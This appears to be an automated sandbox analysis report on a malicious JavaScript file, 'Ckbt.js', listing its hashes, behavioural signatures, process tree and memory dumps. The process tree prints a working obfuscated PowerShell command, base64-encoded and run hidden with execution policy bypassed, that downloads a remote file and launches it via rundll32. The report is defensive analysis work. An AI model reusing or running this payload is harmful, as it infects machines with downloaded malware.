Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    16/05/2023, 13:29

General

  • Target

    Ckbt.js

  • Size

    218KB

  • MD5

    5766bc8031a485df0b03b1dd15b82d3d

  • SHA1

    2cdf7ee78a24e06f9fd5d3e7d515bf60774c720f

  • SHA256

    eec2d6c95416d1ef00e5e37fbd36ae388a24bee4986cde2d9cfebf6d25263a95

  • SHA512

    4cc2b87bce4ff89e559792ecb944365cdb24afc622532bdf5756a5572a02449a999e6d9ebc96111d527c0e67465ee3c2bed25dd3996865f27e0892e5025e866c

  • SSDEEP

    1536:mDS8/yqz10JirHyPUGNjb03yySCpyzn4QrYO9PmJNxw5xUPKY0HdOSLLdmU+xcAm:t8aqz10DH8yQK4QrYO9PmNLx9xIr

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Ckbt.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Ckbt.js" PercenterTrimotor patronne
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbgBvAGMAaABhAHMAaQBhAE4AbwB0AGUAcABhAGQAIAA9ACAAIgBNAGUAcwBtAGUAcgBpAHoAYQBiAGwAZQBBAHIAYwBoAGUAcwBwAG8AcgBpAGEAIgA7ACQATwBtAG4AaQB2AGEAcgBpAG8AdQBzACAAPQAgADQAOQA0ADsAJABBAHIAcgB1AGEAZwB1AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE8AQQBBADQAQQBDADQAQQBNAFEAQQAxAEEARABJAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATgBnAEEAdwBBAEMANABBAE0AUQBBADEAQQBEAEUAQQBMAGcAQQB5AEEARABNAEEATQBnAEEAPQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAJABuAG8AbgBjAG8AbgB2AGUAcgB0AGkAYgBsAHkARABvAHcAYQBnAGUAcgBpAHMAbQAgAD0AIAAiAFUAbgBkAGUAcgBtAG8AdABpAG8AbgBCAG8AdABhAG4AaQB6AGUAZAAiADsAJABSAGUAYgByAHUAcwBoAEQAaQBwAGwAbwBnAGwAbwBzAHMAYQB0AGEAIAA9ACAANQAyADEAOwAkAE4AbwBuAHMAdwBpAG0AbQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAFEAQQB4AEEAQwA0AEEATgB3AEEAMgBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABNAEEAdQBpAG0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHAFEAQQBhAFEAQgB2AEEASABJAEEAYwBnAEIAbwBBAEgAawBBAGQAQQBCAG8AQQBHADAAQQBlAFEAQgBWAEEARwA0AEEAYwBnAEIAbABBAEcAYwBBAGMAZwBCAGwAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEATABnAEIAagBBAEgASQBBAGEAUQBCAGoAQQBHAHMAQQBaAFEAQgAwAEEAQQA9AD0AIgA7ACQAcwB1AHAAZQByAG8AcAB0AGkAbQBpAHMAdABVAHIAYQBsAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAFEAQQBNAHcAQQB1AEEARABFAEEATQBRAEEANQBBAEMAOABBAGQAQQBCAE8AQQBHAFkAQQBMAHcAQgBwAEEARQBvAEEAWgBRAEIAMABBAEgAUQBBAHEAZgBhAFEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAzAEEARABjAEEATABnAEEANQBBAEQARQBBAEwAZwBBADQAQQBEAFkAQQBMAGcAQQB4AEEARABJAEEATQBnAEEAdgBBAEYAWQBBAGIAQQBCAHcAQQBGAFEAQQBMAHcAQgBDAEEARQB3AEEAUgBBAEIAaQBBAEUASQBBAFoAZwBCAG0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABjAG8AbgBzAHQAaQB0AHUAdABlAFAAaQBsAGkAZQBzACAAaQBuACAAJABzAHUAcABlAHIAbwBwAHQAaQBtAGkAcwB0AFUAcgBhAGwAaQBuAGUAIAAtAHMAcABsAGkAdAAgACIAcQBmAGEAUQAiACkAIAB7ACQAbABpAHQAdABsAGUAbgBlAGMAawAgAD0AIAAyADgAMgA7ACQAQwByAHkAcAB0AG8AZwByAGEAbQBtAGkAYwAgAD0AIAA1ADUANgA7ACQAQgBlAHMAdABlAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcARQBBAGIAQQBCAGgAQQBIAEUAQQBkAFEAQgBwAEEASABVAEEAYgBRAEIARABBAEcAOABBAGIAQQBCADEAQQBHADAAQQBZAGcAQgBwAEEARwBVAEEAYwBnAEEAdQBBAEcAdwBBAGEAUQBCAG0AQQBHAFUAQQAiADsAdAByAHkAIAB7ACQAUgBlAGEAYgBzAG8AcgBiAFMAdQBwAGUAcgBjAG8AbgBmAGkAcgBtAGEAdABpAG8AbgAgAD0AIAAiAFAAcgBvAHAAYQBnAHUAbABlACIAOwAkAEkAZABlAG4AdABpAGMAIAA9ACAANwA3ADcAOwAkAHMAbgBvAGIAYgBpAHMAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAG8AbgBzAHQAaQB0AHUAdABlAFAAaQBsAGkAZQBzACkAKQA7AGkAdwByACAAJABzAG4AbwBiAGIAaQBzAGgAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABXAGEAdgBpAHIAYQBQAGgAYQBuAHQAbwBtAHMALgBDAHUAYwB1AG0AYgBlAHIAOwAkAHIAZQBmAHIAYQBjAHQAaQB2AGUAbAB5AEIAcgBvAGMAaABvACAAPQAgACIAUwBoAGUAaABpAHQAYQBIAGUAdABlAHIAbwBkAHIAbwBtAHkAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABXAGEAdgBpAHIAYQBQAGgAYQBuAHQAbwBtAHMALgBDAHUAYwB1AG0AYgBlAHIAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADMANAA3ADMANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAVgB3AEIAaABBAEgAWQBBAGEAUQBCAHkAQQBHAEUAQQBVAEEAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAOABBAGIAUQBCAHoAQQBDADQAQQBRAHcAQgAxAEEARwBNAEEAZABRAEIAdABBAEcASQBBAFoAUQBCAHkAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBAFYAZwBCADEAQQBHAFUAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQAVQBuAHAAcgBlAGMAZQBkAGUAbgB0AGUAZAAgAD0AIAAiAEMAbwBuAGQAZQBuAHMAaQBuAGcAUABhAHQAZQByAG4AYQBsAGkAcwB0AGkAYwAiADsAJABpAHIAcgBlAGcAYQByAGQAbABlAHMAcwAgAD0AIAA1ADMAOAA7AGIAcgBlAGEAawA7AFYAdQBlAEoAUwA7AH0AVgB1AGUASgBTADsAfQAgAGMAYQB0AGMAaAAgAHsAJABUAGEAcgBhAGQAaQBkAGQAbABlAEEAbgB0AGkAcwBlAHIAdQBtAHMAIAA9ACAAMwA4ADQAOwAkAHUAbAB0AHIAYQBzAFMAZQBsAGUAbgBpAHQAaQBmAGUAcgBvAHUAcwAgAD0AIAA5ADkAOwAkAHMAaQBuAGcAdQBsAGEAcgBsAHkAIAA9ACAANAA3ADIAOwB9AH0AJABBAGUAcgBvAGcAdQBuACAAPQAgADgAMAA4ADsA"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1692-58-0x000000001B2A0000-0x000000001B582000-memory.dmp

    Filesize

    2.9MB

  • memory/1692-59-0x0000000002510000-0x0000000002518000-memory.dmp

    Filesize

    32KB

  • memory/1692-60-0x0000000002950000-0x00000000029D0000-memory.dmp

    Filesize

    512KB

  • memory/1692-61-0x0000000002950000-0x00000000029D0000-memory.dmp

    Filesize

    512KB